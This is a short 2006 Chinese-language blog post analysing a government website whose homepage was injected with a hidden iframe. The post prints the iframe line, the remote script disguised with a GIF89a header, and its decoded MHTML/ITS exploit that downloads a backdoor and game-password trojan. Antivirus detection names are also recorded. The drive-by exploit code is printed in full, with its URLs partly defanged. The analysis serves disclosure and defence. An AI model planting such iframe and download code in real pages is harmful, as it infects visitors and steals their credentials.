又一个带毒的政府网站(第3版)
endurer 原创
2006-03-11 第3版 补充:卡巴斯基将1.js报为:Trojan-Downloader.Win32.Delf.aet
2006-03-10 第2版 补充:瑞星将1.js报为:Trojan.DL.Agent.fek
2006-03-09 第1版
该网站首页被加入代码:
〈iframe height=0 width=0 src="hxxp://bbs.***gament.net/4/4.htm"〉〈/iframe〉
hxxp://bbs.***gament.net/4/4.htm的内容为:
〈script language="javascript" src="ah.js"〉〈/script〉
ah.js的内容为:
GIF89a
var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('〈OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:%40MSITStore%3Amhtml%3Ac%3A//%2Emht%21'+GIF89a+'%2f1.js::/%23"〉〈/OBJECT〉');
解密后的代码为:
GIF89a
var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('〈OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c://.mht!'+GIF89a+'/1.js::/#"〉〈/OBJECT〉');
1.js下载文件4.exe,并复制到c:/program files/Internet Explorer下,文件变为test.exe。
Kaspersky将4.exe(test.exe)报为Backdoor.Win32.Delf.adj,瑞星报为Trojan.PSW.GamePass.am